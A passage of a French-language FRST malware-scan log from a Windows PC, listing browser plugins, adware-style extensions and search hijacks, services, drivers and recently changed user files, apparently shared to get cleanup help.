Plugin: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.) FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2014-02-05] (VideoLAN) FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.) FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Arnaud\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.) FF Plugin HKU\S-1-5-21-3295785457-3515427366-3354837301-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Arnaud\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-11] (Google Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2014-09-29] (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2014-09-29] (Apple Inc.) FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\findit.xml [2015-10-12] FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\mystartsearch.xml [2014-12-22] FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-01-03] [non signé] FF HKLM\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Arnaud\AppData\Roaming\Mozilla\Firefox\Profiles\jyok94s4.default\extensions\faststartff@gmail.com => non trouvé(e) FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi FF Extension: IDM integration - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2016-01-27] FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi FF HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Arnaud\AppData\Roaming\IDM\idmmzcc5 FF Extension: IDM CC - C:\Users\Arnaud\AppData\Roaming\IDM\idmmzcc5 [2016-07-24] [non signé] Chrome: ======= CHR dev: Chrome dev build détecté(e)! <======= ATTENTION CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=fr-fr CHR RestoreOnStartup: Default -> "hxxp://q.search-simple.com/?affID=pr_9334154e-2985-43d9-8500-c747aebbb3f1" CHR StartupUrls: Default -> "hxxp://q.search-simple.com/?affID=pr_9334154e-2985-43d9-8500-c747aebbb3f1" CHR DefaultSearchURL: Default -> hxxp://search.yahoo.com/yhs/search?hspart=ddc&hsimp=yhs-ddc_bd&type=120_pr__alt__ddc_dss_bd_com&p={searchTerms} CHR DefaultSearchKeyword: Default -> yahoo.com CHR DefaultNewTabURL: Default -> hxxp://search.yahoo.com/?fr=hp-ddc-bd-tab&type=999_pr__alt__ddc_dsssyctab_bd_com CHR Plugin: (Shockwave Flash) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\PepperFlash\pepflashplayer.dll () CHR Plugin: (Native Client) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\ppGoogleNaClPluginChrome.dll => Pas de fichier CHR Plugin: (Chrome PDF Viewer) - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\53.0.2785.21\pdf.dll => Pas de fichier CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.) CHR Plugin: (EModel scriptable Plugin) - C:\Program Files\Mozilla Firefox\plugins\npEModelPlugin.dll => Pas de fichier CHR Plugin: (Microsoft Office 2013) - C:\Program Files\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll (Microsoft Corporation) CHR Plugin: (PDF-XChange Viewer) - C:\Program Files\Mozilla Firefox\plugins\npPDFXCviewNPPlugin.dll (Tracker Software Products Ltd.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.) CHR Plugin: (QuickTime Plug-in 7.7.1) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.) CHR Plugin: (Microsoft Office 2013) - C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL (Microsoft Corporation) CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation) CHR Plugin: (ArchiCAD) - C:\Program Files\GRAPHISOFT\GDLWebControl\npGDLMozilla.dll (Graphisoft SE) CHR Plugin: (Picasa) - C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) CHR Plugin: (Java(TM) Platform SE 6 U32) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll => Pas de fichier CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN) CHR Plugin: (Google Update) - C:\Users\Arnaud\AppData\Local\Google\Update\1.3.21.135\npGoogleUpdate3.dll => Pas de fichier CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_135.dll => Pas de fichier CHR Plugin: (Java Deployment Toolkit 6.0.320.5) - C:\Windows\system32\npdeployJava1.dll => Pas de fichier CHR Profile: C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (MediaNewTab) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ddncgmfehaelaoifpbcjnfcnigflcplp [2016-03-15] CHR Extension: (GamingWonderland) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\eeojlpepoljdpaoiplnlhcfkoigijimc [2016-06-29] CHR Extension: (SmarterPassword) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahdkacgpocedihpehmmhbcadaaacdmf [2016-06-29] CHR Extension: (Bing) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2015-07-03] CHR Extension: (Wiki Search.me) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcgnigmofekcllgbiejhmigggmgehkip [2016-07-05] CHR Extension: (MusixHub Start) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkbhpmdajdojnnhkfgffkofkjifglkan [2015-10-09] CHR Extension: (VideoDownloadConverter) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikgjglmlehllifdekcggaapkaplbdpje [2016-06-24] CHR Extension: (MusixHub) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\jehfkemccjknagjgcbfccjajkgnbffpj [2015-10-08] CHR Extension: (Skype) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-05-24] CHR Extension: (FromDocToPDF) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-06-24] CHR Extension: (Ask Search) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2015-08-28] CHR Extension: (iLivid) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2015-08-28] CHR Extension: (IDM Integration Module) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-06-11] CHR Extension: (Cantataweb) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\njolopcmjlebcohgapconpmaammpdfpk [2015-04-07] [UpdateUrl: hxxp://wwwcantatawebnet-a.akamaihd.net/update/chrome] <==== ATTENTION CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04] CHR Extension: (NewTabTVPlus) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohfhhhmdgchjchifbmkgkingkogpfmpb [2016-03-03] CHR Extension: (电脑管家上网防护) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2016-06-22] CHR Extension: (Chrome Media Router) - C:\Users\Arnaud\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-07-04] CHR Extension: (Skype) - C:\Users\Arnaud\AppData\Roaming\Mozila [2015-06-23] CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-01-03] CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2016-01-28] CHR HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx StartMenuInternet: Google Chrome.XGGY3XEPZ4VSBPG357HB2M5PHQ - C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe ==================== Services (Avec liste blanche) ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 Autodesk Content Service; C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe [12288 2012-12-13] (Autodesk, Inc.) [Fichier non signé] S3 BstHdAndroidSvc; C:\Program Files\BlueStacks\HD-Service.exe [437880 2015-08-19] (BlueStack Systems, Inc.) R2 BstHdLogRotatorSvc; C:\Program Files\BlueStacks\HD-LogRotatorService.exe [413304 2015-08-19] (BlueStack Systems, Inc.) R2 BstHdUpdaterSvc; C:\Program Files\BlueStacks\HD-UpdaterService.exe [839288 2015-08-19] (BlueStack Systems, Inc.) R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1363616 2014-01-03] (Microsoft Corporation) R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1748640 2014-01-03] (Microsoft Corporation) R2 CodeMeter.exe; C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe [2368912 2011-12-16] (WIBU-SYSTEMS AG) S3 FlexNet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [1064312 2014-09-29] (Flexera Software LLC) R2 hasplms; C:\Windows\system32\hasplms.exe [4466120 2013-01-11] (SafeNet Inc.) R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [271712 2011-03-14] () R2 LuckyBrowse; C:\Program Files\LuckyBrowse\app\luckyBrowseStarter.exe [281600 2015-09-17] () [Fichier non signé] R2 MATLAB License Server; C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe [1500424 2010-07-01] (Acresso Software Inc.) R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) S4 msvsmon80; C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\Remote Debugger\x86\msvsmon.exe [2799808 2005-09-23] (Microsoft Corporation) S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) R2 NitroDriverReadSpool9; C:\Program Files\Nitro\Pro 9\NitroPDFDriverService9.exe [197128 2014-07-16] (Nitro PDF Software) R2 NitroUpdateService; C:\Program Files\Nitro\Pro 9\Nitro_UpdateService.exe [392712 2014-07-16] () R2 RCdsrv2; C:\Windows\system32\rcdsrv.exe [32768 2005-01-31] () [Fichier non signé] R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe [142408 2013-01-18] (Realtek Semiconductor) S2 SNS EVDO-Huawei. RunOuc; C:\Program Files\SNS EVDO-Huawei\UpdateDog\ouc.exe [655712 2016-01-21] () S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Fichier non signé] S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation) S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe -f "C:\ProgramData\\ApplicationHosting\\ApplicationHosting.dat" -l -a S2 cohci1394; "C:\Program Files\Controller\cohc.exe" /s iid=1932266 did=APSnapdoAMRev sid=3 ref=8a70a76f-600a-03c8-d59c-6e8a8dc0e842-PolicyMac id=6c8746ea48dfa61e2306f466d7e83d17367e44fe3a3fa6860457de4adf7a73f8 [X] S2 Saophase; C:\ProgramData\\Saophase\\Saophase.exe -f "C:\ProgramData\\Saophase\\Saophase.dat" -l -a S2 Update Cantataweb; "C:\Program Files\Cantataweb\updateCantataweb.exe" [X] S2 Util Cantataweb; pas de ImagePath ===================== Pilotes (Avec liste blanche) ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 aksfridge; C:\Windows\system32\drivers\aksfridge.sys [376200 2013-02-19] (SafeNet Inc.) R2 BstHdDrv; C:\Program Files\BlueStacks\HD-Hypervisor-x86.sys [132216 2015-08-19] (BlueStack Systems) R2 hardlock; C:\Windows\system32\drivers\hardlock.sys [608136 2013-03-07] (SafeNet Inc.) R0 iaStorA; C:\Windows\System32\DRIVERS\iaStorA.sys [526904 2012-12-11] (Intel Corporation) R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [25656 2012-12-11] (Intel Corporation) R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [16440 2012-12-04] (Intel Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10372096 2012-12-06] (Intel Corporation) S3 NETwNv32; C:\Windows\System32\DRIVERS\NETwNv32.sys [6923264 2011-01-19] (Intel Corporation) R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [6357648 2012-09-19] (Realtek Semiconductor Corp.) R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [112096 2012-02-09] (Power Software Ltd) R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2014-09-28] () [Fichier non signé] S3 TSSK; C:\Windows\System32\tssk.sys [83576 2016-03-16] (电脑管家) R3 wacomrouterfilter; C:\Windows\System32\DRIVERS\wacomrouterfilter.sys [13296 2012-12-20] (Wacom Technology) R1 {01858d74-83fb-44eb-a0f3-805eed34f689}Gw; C:\Windows\System32\drivers\{01858d74-83fb-44eb-a0f3-805eed34f689}Gw.sys [43152 2015-01-06] (StdLib) R1 {8049d9d8-3550-48db-8757-eed8d076dc3f}Gw; C:\Windows\System32\drivers\{8049d9d8-3550-48db-8757-eed8d076dc3f}Gw.sys [43152 2015-01-12] (StdLib) R1 {a3683581-618c-4715-bb65-8cadd4684acf}Gw; C:\Windows\System32\drivers\{a3683581-618c-4715-bb65-8cadd4684acf}Gw.sys [43152 2014-12-21] (StdLib) R1 {fddd69d0-0a0b-432c-b520-59801bbefc91}Gw; C:\Windows\System32\drivers\{fddd69d0-0a0b-432c-b520-59801bbefc91}Gw.sys [43152 2015-01-09] (StdLib) U3 apfy20vx; C:\Windows\system32\Drivers\apfy20vx.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zéro octet Fichier/Dossier) S3 hwusb_cdcacm; system32\DRIVERS\ew_cdcacm.sys [X] S3 hwusb_wwanecm; system32\DRIVERS\ew_wwanecm.sys [X] U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [102272 2015-12-23] (Huawei Technologies Co., Ltd.) [Fichier non signé] S1 QMUdisk; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\QMUdisk.sys [X] S3 softaal; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\softaal.sys [X] S1 SRepairDrv; \??\C:\Program Files\Tencent\QQPCMGR\SRepairDrv [X] S3 TcHardWare; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\QQPCHW.sys [X] S2 tsnethlp; \??\C:\Program Files\Tencent\QQPCMgr\11.6.17645.227\TsNetHlp.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois - Créés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2016-07-25 11:18 - 2016-07-25 11:19 - 00000000 ____D C:\FRST 2016-07-24 20:18 - 2016-07-24 20:18 - 00000000 ____H C:\ProgramData\cm-lock 2016-07-24 20:18 - 2016-07-24 20:18 - 00000000 ____D C:\Windows\LastGood 2016-07-24 20:18 - 2007-11-09 11:00 - 00023640 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS 2016-07-22 16:03 - 2016-07-22 16:03 - 00096831 _____ C:\Users\Arnaud\Desktop\ACFrOgD_rwSF15oK0yyu0cFNxorx8M7HyoFo_NAIg5PNDQVibbZYZxuRMHs83h02YzUkQ7J2q8E9964uoubXv9kw-gyRsfK2a696wTX6UlqECYFR0daJfx9SvD8aG9I=.pdf 2016-07-22 15:38 - 2016-07-22 15:38 - 00000036 _____ C:\Users\Arnaud\AppData\Local\housecall.guid.cache 2016-07-22 12:08 - 2016-07-22 12:09 - 00360675 _____ C:\Users\Arnaud\Downloads\Dossier Administratif0001.pdf 2016-07-21 15:03 - 2016-07-21 15:03 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Smadav 2016-07-21 15:03 - 2016-07-21 15:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus 2016-07-21 10:45 - 2016-07-25 11:18 - 00001455 _____ C:\Users\Arnaud\Desktop\Internet Explorer.lnk 2016-07-21 10:45 - 2016-07-25 11:18 - 00001455 _____ C:\Users\Arnaud\Desktop\Google Chrome.lnk 2016-07-20 14:07 - 2016-07-20 14:07 - 01042871 _____ C:\Users\Arnaud\Desktop\DIPET.PDF 2016-07-19 16:30 - 2016-07-19 16:30 - 00190756 _____ C:\Users\Arnaud\Downloads\lettre de motivation.pdf 2016-07-19 15:59 - 2016-07-19 15:59 - 00109731 _____ C:\Users\Arnaud\Downloads\CV.pdf 2016-07-19 12:18 - 2016-07-19 12:18 - 00142892 _____ C:\Users\Arnaud\Downloads\Montage Structures Métalliques Centre GPL Bertoua.pdf 2016-07-19 10:38 - 2016-07-19 10:40 - 04294376 _____ C:\Users\Arnaud\Downloads\CATALOGUE CONSTRUCTION MODULAIRE 2016.pdf 2016-07-18 17:12 - 2016-07-18 17:12 - 00220719 _____ C:\Users\Arnaud\Downloads\cameroun3_profession.pdf 2016-07-16 14:09 - 2016-07-16 14:09 - 00571056 _____ C:\Users\Arnaud\Desktop\CV-ndjemeli.pdf 2016-07-16 13:22 - 2016-07-16 13:23 - 02063077 _____ C:\Users\Arnaud\Downloads\Pièces jointes_2016716.zip 2016-07-16 12:28 - 2016-07-16 12:28 - 00000000 _____ C:\Users\Arnaud\Downloads\Curriculum_Vitae_detaille.pdf 2016-07-16 12:28 - 2016-07-16 12:28 - 00000000 _____ C:\Users\Arnaud\Downloads\Curriculum_Vitae_detaille (1).pdf 2016-07-15 16:54 - 2016-07-15 16:59 - 00000000 ____D C:\Users\Arnaud\Desktop\Nouveau dossier 2016-07-15 16:51 - 2016-07-15 16:51 - 00073168 _____ C:\Users\Arnaud\Downloads\ETUDIANTS FGI 2012-2013 (2).xlsx 2016-07-14 12:07 - 2016-07-14 12:07 - 00000987 _____ C:\Users\Arnaud\Desktop\The Logo Creator v5.exe.lnk 2016-07-14 12:07 - 2016-07-14 12:07 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Logo Creator v5 2016-07-14 12:07 - 2016-07-14 12:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Logo Creator v5 2016-07-14 12:05 - 2016-07-14 12:07 - 00000000 ____D C:\Program Files\The Logo Creator v5 2016-07-13 13:17 - 2016-07-13 13:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SuperCopier2 2016-07-13 12:47 - 2016-07-13 12:47 - 00001206 _____ C:\ProgramData\ProgramData.lnk.lnk 2016-07-12 16:11 - 2016-07-13 12:47 - 00000000 _RSHD C:\Skypee 2016-07-12 16:10 - 2016-07-23 13:43 - 00000000 _RSHD C:\Google 2016-07-12 13:35 - 2016-07-12 13:37 - 02345909 _____ C:\Users\Arnaud\Downloads\CEMS PROMOTION PDF.pdf 2016-07-12 13:30 - 2016-07-12 13:30 - 00050668 _____ C:\Users\Arnaud\Downloads\CV julien.pdf 2016-07-05 11:55 - 2016-07-05 11:55 - 00125092 _____ C:\Users\Arnaud\Downloads\calscol2017fr.pdf 2016-07-04 11:29 - 2016-07-04 11:29 - 00011741 _____ C:\Users\Arnaud\Downloads\Liste_des_apprenants_ER.xlsx 2016-07-04 09:10 - 2016-07-04 09:11 - 00030109 _____ C:\Users\Arnaud\Downloads\RAPPORT HEBDO.xlsx 2016-06-28 15:32 - 2016-06-28 15:32 - 14634624 _____ (BlueStack Systems Inc.) C:\Users\Arnaud\Downloads\bluestacks-2.exe 2016-06-28 15:32 - 2016-06-28 15:32 - 00001807 _____ C:\Users\Public\Desktop\Apps.lnk 2016-06-28 15:32 - 2016-06-28 15:32 - 00001725 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\ProgramData\BlueStacks 2016-06-28 15:29 - 2016-06-28 15:29 - 00000000 ____D C:\Program Files\BlueStacks 2016-06-28 15:27 - 2016-06-28 15:27 - 00000000 ____D C:\Users\Arnaud\AppData\Local\Bluestacks 2016-06-28 15:23 - 2016-06-28 15:23 - 14634624 _____ (BlueStack Systems Inc.) C:\Users\Arnaud\Downloads\bluestacks-2 [1].exe 2016-06-28 15:23 - 2016-06-28 15:23 - 00001773 _____ C:\Users\Arnaud\Desktop\MyPC Backup.lnk 2016-06-28 15:23 - 2016-06-28 15:23 - 00000000 ____D C:\Program Files\OLBPre 2016-06-28 12:18 - 2016-06-28 12:35 - 30071931 _____ C:\Users\Arnaud\Downloads\WhatsApp Messenger_v2.16.141_apkpure.com.apk 2016-06-28 12:18 - 2016-06-28 12:22 - 08339432 _____ C:\Users\Arnaud\Downloads\MyEasyLight_v0.0.2_apkpure.com.apk 2016-06-28 11:30 - 2016-06-28 11:30 - 00894695 _____ C:\Users\Arnaud\Downloads\facebook-amelietsapiyomei (1).zip 2016-06-28 10:51 - 2016-06-28 10:51 - 00000000 ____D C:\Program Files\Common Files\Aladdin Shared 2016-06-28 10:51 - 2013-02-19 15:17 - 00376200 _____ (SafeNet Inc.) C:\Windows\system32\Drivers\aksfridge.sys 2016-06-28 10:51 - 2013-01-11 16:36 - 04466120 _____ (SafeNet Inc.) C:\Windows\system32\hasplms.exe 2016-06-28 10:51 - 2013-01-11 16:36 - 04466120 _____ (SafeNet Inc.) C:\Windows\system32\aksllmtp.exe 2016-06-28 10:50 - 2013-01-14 12:34 - 00198088 _____ (Aladdin Knowledge Systems Ltd.) C:\Windows\system32\hlvdd.dll 2016-06-28 10:49 - 2016-06-28 10:49 - 00000000 ____D C:\Program Files\Terrasol ==================== Un mois - Modifiés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2016-07-25 11:15 - 2014-11-23 12:15 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\uTorrent 2016-07-25 11:08 - 2016-05-09 19:14 - 00011264 _____ C:\Users\Arnaud\AppData\Roaming\CDRusersDB.v12 2016-07-25 11:05 - 2014-11-02 22:43 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Nitro PDF 2016-07-25 10:54 - 2014-11-03 20:46 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\TeraCopy 2016-07-25 10:54 - 2014-09-23 21:21 - 00000000 ____D C:\Users\Arnaud\Desktop\AUTO ECOLE 2016-07-25 10:50 - 2014-09-27 15:26 - 00001002 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-07-24 20:29 - 2014-09-27 15:22 - 00000000 __SHD C:\[Smad-Cage] 2016-07-24 20:24 - 2009-07-14 05:34 - 00032928 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2016-07-24 20:24 - 2009-07-14 05:34 - 00032928 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2016-07-24 20:19 - 2014-09-27 15:28 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Skype 2016-07-24 20:16 - 2016-04-01 09:16 - 00000000 ____D C:\Users\Arnaud\AppData\LocalLow\uTorrent 2016-07-24 20:16 - 2009-07-14 05:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2016-07-24 20:14 - 2015-08-19 10:43 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\DMCache 2016-07-24 18:11 - 2011-02-14 09:02 - 00810618 _____ C:\Windows\system32\perfh00C.dat 2016-07-24 18:11 - 2011-02-14 09:02 - 00173194 _____ C:\Windows\system32\perfc00C.dat 2016-07-24 18:11 - 2010-11-20 22:01 - 01844980 _____ C:\Windows\system32\PerfStringBackup.INI 2016-07-24 18:11 - 2009-07-14 03:37 - 00000000 ____D C:\Windows\inf 2016-07-22 12:29 - 2015-08-10 09:39 - 02303488 ___SH C:\Users\Arnaud\Desktop\Thumbs.db 2016-07-21 15:03 - 2014-09-27 15:22 - 00000982 _____ C:\Users\Public\Desktop\SMADΔV.lnk 2016-07-21 15:03 - 2014-09-27 15:22 - 00000000 ____D C:\Program Files\SMADAV 2016-07-21 10:59 - 2014-09-27 15:32 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\vlc 2016-07-20 15:39 - 2014-09-27 15:24 - 00002472 _____ C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-07-19 10:06 - 2014-09-27 15:28 - 00000000 ___RD C:\Program Files\Skype 2016-07-19 10:06 - 2014-09-27 15:28 - 00000000 ____D C:\ProgramData\Skype 2016-07-15 16:20 - 2015-09-11 10:00 - 00000000 ____D C:\Program Files\SuperCopier3 2016-07-14 11:11 - 2015-11-27 11:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\腾讯软件 2016-07-14 11:11 - 2015-11-27 09:49 - 00000000 ____D 